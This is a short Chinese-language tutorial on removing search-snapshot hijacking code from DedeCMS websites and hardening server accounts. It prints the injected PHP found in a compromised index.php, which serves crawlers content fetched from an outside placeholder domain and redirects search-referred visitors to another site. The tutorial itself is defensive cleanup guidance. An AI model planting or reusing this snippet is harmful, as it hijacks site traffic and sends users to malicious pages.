織夢百度快照劫持注入代碼防范及清除,很多站長做站的過程中,都碰過百度快照被劫持等問題,明明已經(jīng)修復(fù)模板文件了,還是沒有更新回正常的快照,以織夢系統(tǒng)為例,
往往根目錄/index.php也被植入惡意代碼
比如:
<?php if(strpos($_SERVER['HTTP_USER_AGENT'],"spider")||strpos($_SERVER["HTTP_USER_AGENT"],"google")>-1){ $str=file_get_contents("http://域名.com/");echo $str; } $domain=array('baidu','so'); $fromurl=@strtolower($_SERVER['HTTP_REFERER']); foreach ($domain as $v) { if (strpos($fromurl,$v)!==false) { $target="http://域名.com/index.html"; header("Location:".$target); exit; }}?> |
單這段代碼就直接把搜索引擎蜘蛛搞暈,帶到別的惡意網(wǎng)址去。
把其刪掉,如果在index.php里沒找到,但還是存在類似的問題,可以用dw全站搜索下。
關(guān)于防范,空間,ftp賬號,權(quán)限,后臺賬號之類都需要設(shè)置下,不能太過簡單,可以看相關(guān)教程《》
版權(quán)聲明: 本站資源均來自互聯(lián)網(wǎng)或會員發(fā)布,如果侵犯了您的權(quán)益請與我們聯(lián)系,我們將在24小時內(nèi)刪除!謝謝!
轉(zhuǎn)載請注明: 織夢dedecms百度快照劫持注入代碼防范與清除